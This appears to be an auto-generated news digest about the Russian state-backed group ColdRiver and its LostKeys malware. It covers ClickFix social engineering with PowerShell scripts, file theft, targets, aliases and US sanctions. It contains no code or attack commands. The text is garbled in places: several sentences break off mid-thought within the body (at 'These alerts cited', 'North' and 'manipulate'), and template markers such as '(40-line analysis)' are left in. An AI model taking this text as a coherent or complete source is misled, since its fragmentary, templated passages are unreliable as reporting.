Inside Russia’s Digital Espionage: ColdRiver’s Use of LostKeys Malware to Breach Western Targets

Listen to this Post

Featured Image

Introduction

A new chapter in global cyber-espionage is unfolding as the Russian-backed hacking collective ColdRiver has launched a sophisticated campaign leveraging a newly discovered malware dubbed “LostKeys.” This cyber weapon has been deployed since the start of the year and is targeting high-profile Western entities, including governments, journalists, think tanks, and NGOs. As the geopolitical tension surrounding the war in Ukraine persists, cyber fronts have become increasingly active, with ColdRiver at the center of a broader Russian intelligence operation.

Backed by the Russian Federal Security Service (FSB), this state-sponsored actor isn’t operating in isolation. Their operations intersect with other notorious threat groups from North Korea, Iran, and Russia itself. With a reliance on clever social engineering tactics and cutting-edge malware, ColdRiver has become one of the most persistent digital threats on the world stage. Here’s a comprehensive look into their latest activity, tactics, and what it means for global cybersecurity.

Key Developments on the ColdRiver Campaign

(Digest-style summary in 30 lines)

ColdRiver is a Russian state-sponsored cyber-espionage group.

In early 2025, they began using a new malware known as LostKeys.
Targets include Western government bodies, journalists, NGOs, and policy think tanks.

LostKeys is used in ClickFix social engineering campaigns.

ClickFix tricks victims into launching malicious PowerShell scripts.

These scripts deploy additional payloads and the final LostKeys malware.
LostKeys is capable of file theft from specific directories and file types.
It also transmits system data and running processes back to attackers.
The malware marks an evolution in ColdRiver’s espionage arsenal.
ColdRiver was publicly linked to Russia’s FSB in December 2024.

Google’s Threat Intelligence Group (GTIG) tracked LostKeys deployment.

GTIG emphasizes LostKeys is selectively deployed on high-value targets.
ColdRiver has previously used another malware, SPICA, for similar missions.
Other nations’ APT groups—Kimsuky (North Korea), MuddyWater (Iran), and APT28 (Russia)—also use ClickFix-style attacks.
ColdRiver has aliases including Star Blizzard, Callisto Group, and Seaborgium.
The group has been active since at least 2017, using OSINT to choose victims.
December 2023 saw coordinated warnings from Five Eyes nations.

These alerts cited

Their scope widened post-Ukraine invasion to energy and defense infrastructure.
Microsoft previously interrupted ColdRiver’s social engineering campaigns in 2022.

That operation involved email harvesting from NATO-related targets.

In December 2023, two ColdRiver hackers were sanctioned and indicted in the U.S.
One of them was confirmed as an FSB officer.
The U.S. now offers up to \$10 million for leads on ColdRiver members.
ColdRiver represents a deeply embedded espionage wing of Russian cyber efforts.
GTIG’s findings add critical insight into evolving nation-state cyber strategies.
LostKeys malware reflects a growing emphasis on stealth and selectivity.
The malware’s focus on high-value targets underlines its precision design.
ColdRiver’s ongoing adaptability underscores the need for resilient cyber defenses.
The international response signals increasing urgency in countering state-backed threats.

What Undercode Say:

(40-line analysis)

The emergence of LostKeys malware is not merely an incremental change—it marks a significant strategic leap in how state-sponsored espionage groups operate. ColdRiver’s choice to use LostKeys in highly selective situations suggests this tool is reserved for the most high-stakes intelligence collection efforts. The reliance on PowerShell and Visual Basic Scripts shows a clear preference for exploiting built-in system functionalities to avoid detection by traditional antivirus tools, making the campaign particularly insidious.

What’s notable is the pattern of behavior aligning with ColdRiver’s historic operational fingerprint. Their use of OSINT and social engineering in ClickFix campaigns reveals a meticulous approach to reconnaissance—victims are not randomly selected but carefully profiled. This level of preparation is a hallmark of professional intelligence operations, underscoring that ColdRiver operates more like a covert agency than a rogue hacker collective.

LostKeys appears to supplement existing tools like SPICA, suggesting ColdRiver has developed a modular toolkit of malware. These tools can be deployed interchangeably based on the target’s defense profile and the intelligence value of their data. This modularity improves operational flexibility and reduces the risk of detection from over-reliance on a single strain of malware.

The involvement of multiple nation-state groups—North

On a broader level, ColdRiver’s renewed activity, especially against the backdrop of the Ukraine conflict, highlights the blurred lines between conventional warfare and cyberwarfare. Infiltrating NGOs, defense contractors, and government organizations doesn’t just yield sensitive documents—it can influence foreign policy, disrupt supply chains, and even manipulate

References:

Reported By: www.bleepingcomputer.com
Extra Source Hub:
https://www.linkedin.com
Wikipedia
Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram